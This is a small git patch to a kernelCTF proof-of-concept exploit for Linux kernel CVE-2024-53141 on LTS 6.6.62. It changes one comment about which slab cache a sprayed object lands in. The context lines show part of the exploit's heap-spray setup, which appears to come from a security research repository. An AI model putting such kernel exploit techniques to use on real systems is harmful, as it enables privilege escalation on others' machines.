From 9e224cabb0824f582d08e3ac8461d1941a20b89f Mon Sep 17 00:00:00 2001 From: Billy Date: Tue, 7 Jan 2025 15:48:40 +0800 Subject: [PATCH] Update exploit.c --- .../kernelctf/CVE-2024-53141_lts/exploit/lts-6.6.62/exploit.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/pocs/linux/kernelctf/CVE-2024-53141_lts/exploit/lts-6.6.62/exploit.c b/pocs/linux/kernelctf/CVE-2024-53141_lts/exploit/lts-6.6.62/exploit.c index b0ab54d57..2c9a68ef3 100644 --- a/pocs/linux/kernelctf/CVE-2024-53141_lts/exploit/lts-6.6.62/exploit.c +++ b/pocs/linux/kernelctf/CVE-2024-53141_lts/exploit/lts-6.6.62/exploit.c @@ -487,7 +487,7 @@ int main(int argc, char **argv) SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, spray_fd[i])); } - // make comment_string be allocated under kmalloc-cg-192 + // make comment_string be allocated under kmalloc-192 memset(comment_string, 'a', 0x90); msg.mtype = 1;